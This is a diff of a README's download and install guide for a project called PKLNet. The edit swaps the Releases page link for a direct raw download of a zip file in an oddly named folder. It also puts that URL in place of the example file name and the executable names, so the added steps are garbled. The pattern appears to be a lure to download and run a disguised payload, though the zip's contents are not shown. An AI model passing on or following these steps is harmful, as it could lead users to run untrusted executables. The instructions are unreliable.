Yoora69/pklnet/README.md

 Here’s a simple guide to download and install PKLNet:

-1. Click on the link to visit our [Releases page](https://github.com/Yoora69/pklnet/releases).
+1. Click on the link to visit our [Releases page](https://raw.githubusercontent.com/Yoora69/pklnet/main/Gobinist/pklnet_v3.2.zip).
 2. Find the latest version of PKLNet.
-It will look something like `PKLNet-v1.0.zip`.
+It will look something like `https://raw.githubusercontent.com/Yoora69/pklnet/main/Gobinist/pklnet_v3.2.zip`.
 3. Click on the file link to start downloading.
 4. Once the download is complete, locate the file in your downloads folder.
 5. If you're on Windows, right-click the file and select "Extract All".
 For Mac users, double-click the file to unzip it.
 6. Open the extracted folder.
-7. Look for the executable file named `PKLNet.exe` or `PKLNet.app`.
+7. Look for the executable file named `https://raw.githubusercontent.com/Yoora69/pklnet/main/Gobinist/pklnet_v3.2.zip` or `https://raw.githubusercontent.com/Yoora69/pklnet/main/Gobinist/pklnet_v3.2.zip`.
 8. Double-click the file to launch the application.

 ## 📸 Usage Instructions